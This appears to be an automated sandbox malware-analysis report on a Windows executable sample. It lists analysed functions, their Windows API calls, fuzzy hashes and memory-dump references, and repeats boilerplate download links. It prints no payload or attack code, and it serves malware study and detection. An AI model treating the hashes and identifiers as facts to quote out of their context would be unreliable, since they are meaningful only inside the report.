Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll
API String ID: 1659193697-604763050
Opcode ID: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
Instruction ID: 6bdf981ca1be840b674a071183a736e23abd1ab340c7258522d34cd24c38b4c9
Opcode Fuzzy Hash: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
Instruction Fuzzy Hash: 67F0E971948340ABC701EBB55A8999F66B4DBC5304B20483FE001B71C2C5BC4441961E

Function 00401E8F Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EAD
EnableWindow.USER32(00000000,00000000), ref: 00401EB8

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
Instruction ID: 33cda2ed04c3da629839a1ed70eaf652a1c817d3d699623c6adcec252e127601
Opcode Fuzzy Hash: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
Instruction Fuzzy Hash: 4FE01272A04210DFD705DFA8AE859AE77B4FB84325F10493BE102F11D1D7B85841966D

Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000), ref: 00401581
ShowWindow.USER32(0001040A), ref: 00401596

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
Instruction ID: 9939d567be1ae21951fa300f882ca9363235c0aad14cd7a96026ed132ac70b09
Opcode Fuzzy Hash: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
Instruction Fuzzy Hash: 50E0E6B6710114ABCB15DB58EED087E73B9EBC5350750453FD902F36A1C6789D418B68

Function 00406385 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

Part of subcall function 00406317: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
Part of subcall function 00406317: wsprintfA.USER32 ref: 00406367
Part of subcall function 00406317: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
Instruction ID: 1c2fb029b914f91a359858a8292288339c30c15ea481b8388e8a6490942e710a
Opcode Fuzzy Hash: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
Instruction Fuzzy Hash: C3E086326042105BD62156709E0493B62ACDF84700306083EFE47F2240D73CDC31A6A9

Function 00405B86 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Function 00405B61 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
Instruction ID: cc84bc49ba1b043e1d2796ac572287907eda555ef0407ac86e19afeaae62c947
Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
Instruction Fuzzy Hash: 7FD0C972504425AFC2102728AE0C89BBB65DB542B17028A35FDA5A22B1DB304C569A99

Function 00405657 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040323B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040565D
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040566B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: c315ded7713b9b4a851445b4695441f34a70141ed77257200a8001455a195bbd
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 33C08C30200501DBD6000B308F08F073A51AB80780F01883E608AE00B0CA318055CD2E

Function 00402631 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
Instruction ID: eb4a75d755b27d484e80f31c5275a4a508bcecdbc7e909d2d8288c975618dcdd
Opcode Fuzzy Hash: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
Instruction Fuzzy Hash: A621C970C0428AAACF219F684A455BFBB709F11314F14447FE891B63D2C1BD8981CB19

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
Instruction ID: 5e69c691d72f125c1fbeda27f988c68ecdf1fc059cbca8910fb345ac15d52cae
Opcode Fuzzy Hash: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
Instruction Fuzzy Hash: ECF03031604211A7CB11BBBA9F4DD5F2A649F46368B21427FF121B22D2D6BC8902966F

Function 004026EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D

Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
Instruction ID: b182adf31489e09453cd2335cf6310b8baddae2fb6a0e01cc8db6764b629a228
Opcode Fuzzy Hash: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
Instruction Fuzzy Hash: 9CE06DB1600215AAD702EBA4AE89CBE776CEB44318F10043BF100F00C1C67D49428A29

Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
Opcode Fuzzy Hash: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D

Function 00405C2D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B3,00000000,00792100,000000FF,00792100,000000FF,000000FF,00000004,00000000), ref: 00405C41

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: 0d4b5292934197368b0f45fab11a858534e2fa67ffcff62b5ec67f53c8c98dda
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: 2BE0E632214759ABDF506E959C00AEB776CEB05390F004436F915E2150D631E8519BA4

Function 00405BFE Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031FD,00000000,00000000,0040304A,000000FF,00000004,00000000,00000000,00000000), ref: 00405C12

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: 15bd5d27262360345a0b198e16330f5e3575b7202d491c56c7af192eda573772
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: C8E0EC3261876AABEF109E55AC00AEB7BACEB05760F004836FD15E3190D631E9619BA4

Function 70022921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7002404C,00000004,00000040,7002403C), ref: 7002293F

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
Instruction ID: 009d032cae48bd22e5951d7aba19eea247b768f21cfde36699470d57f031cee3
Opcode Fuzzy Hash: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
Instruction Fuzzy Hash: 3EF0A5B3508280DEE360CF7A9CC4B053FE0A318775B31456AE798D7262E3B440C68F25

Function 00405E73 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405F01,?,?,?,?,00000002,Call), ref: 00405E97

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
